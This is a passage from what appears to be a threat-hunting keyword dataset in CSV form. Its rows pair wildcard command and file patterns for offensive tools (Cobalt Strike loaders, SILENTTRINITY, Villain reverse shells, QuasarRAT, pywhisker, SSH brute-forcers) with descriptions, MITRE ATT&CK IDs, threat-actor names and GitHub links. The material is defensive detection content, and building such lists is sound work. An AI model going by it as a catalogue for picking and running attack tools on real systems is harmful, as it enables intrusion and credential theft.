./exp.py --url http://*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" +"*python3 fee.py*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*python3 gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*python3 GetHash.py NtCreateFile*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*python3 -m orbitaldump *","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*python3 -m S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*python3 Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*python3 pacu.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*python3 rsf.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*python3 scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*python3 sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*python3 st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python3 st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python3*.exe .\nxc*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*python3??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python3??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python3_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*python3_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*pywerview.py*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*pywhisker.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pywhisker.py*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*pywhisker-main*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*pywsus.py*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" +"*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*qtc-de/remote-method-guesser*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*QUAPCInjectAsSystem*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*QUAPCInjectElevated*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*QUAPCInjectWithoutPid*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*Quasar.Client.*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.exe*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.Server*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.sln*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*quasar/Quasar*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar-master.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*QuasarRAT*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*quentinhardy*msdat*","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","8","764","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z" +"*quser.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*quser.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*qwinsta /server:*","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","3","8","N/A","N/A","N/A","N/A" +"*qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" 